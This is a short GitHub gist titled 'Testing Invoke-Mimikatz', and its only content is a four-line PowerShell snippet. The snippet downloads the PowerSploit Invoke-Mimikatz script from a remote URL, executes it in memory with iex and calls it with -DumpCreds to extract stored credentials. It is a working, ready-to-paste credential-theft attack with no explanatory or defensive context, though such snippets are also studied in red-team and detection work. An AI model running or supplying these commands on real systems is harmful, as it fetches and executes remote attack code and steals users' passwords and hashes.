Skip to content

Instantly share code, notes, and snippets.

@obscuresec
Created May 20, 2014 18:46
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save obscuresec/f24832d8b02288ab6532 to your computer and use it in GitHub Desktop.
Save obscuresec/f24832d8b02288ab6532 to your computer and use it in GitHub Desktop.
Testing Invoke-Mimikatz
$wc=new-object net.webclient
$im=$wc.downloadstring('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
iex $im
invoke-mimikatz -DumpCreds
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment